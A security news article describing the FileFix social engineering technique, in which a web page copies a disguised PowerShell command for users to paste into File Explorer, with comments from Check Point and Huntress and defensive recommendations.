Cybercriminals are now experimenting with a stealthy new attack method dubbed FileFix, capable of slipping past standard security systems with ease. According to cybersecurity experts at Check Point, attackers have already begun deploying the method in real-world scenarios — and though current payloads remain non-malicious, they warn that true malware deployment may be just around the corner.
The FileFix technique builds on ClickFix, a social engineering trick designed to lure users into running malicious commands via the Windows Run dialog. But FileFix requires even less user interaction. It opens a File Explorer window from a web page and quietly copies a disguised PowerShell command to the user’s clipboard. When unsuspecting victims paste it into the address bar, the command executes — without raising any security alarms.
“This isn’t about exploiting vulnerabilities — it’s about exploiting user behavior and trust,” Check Point researchers stated.
Security teams are particularly concerned about how quickly this method has gained traction. Just days after FileFix was publicly disclosed, Check Point noticed known threat actors already testing it in live environments.
“The rise of ClickFix in 2025 proves that social engineering remains one of the most cost-effective ways to bypass security,” they added. “FileFix is the next evolution — and it’s moving fast.”
Dray Agha, Senior Manager of Security Operations at Huntress, echoed those concerns, noting that the FileFix method has already been seen in widespread use. “It’s effective because it abuses core Windows functions and avoids traditional red flags. Users think they’re just pasting a file path — but they’re actually running malicious code.”
Agha confirmed Huntress has observed “aggressive deployment” of FileFix in the wild, tricking users at a scale that’s “deeply concerning.”
How to Stay Protected from FileFix
Check Point has issued specific recommendations for cybersecurity teams:
- Closely monitor phishing pages, especially those mimicking trusted services or using deceptive templates like those resembling Cloudflare verification screens.
- Adjust security rules to detect suspicious clipboard activity or unexpected PowerShell commands initiated by user actions.
- Keep user training and incident response protocols updated to reflect new social engineering trends.
They also encourage cultivating a “culture of verification”, urging employees to double-check unusual requests with IT or security teams before acting.
Users should treat any web page or email prompting them to copy and paste information with caution. Legitimate platforms rarely ask users to manually execute commands to resolve issues, and such requests should always raise red flags.
Stay ahead of emerging cybersecurity threats. For the latest insights and updates on cloud security, follow SOC News.
News Source: ITPro.com
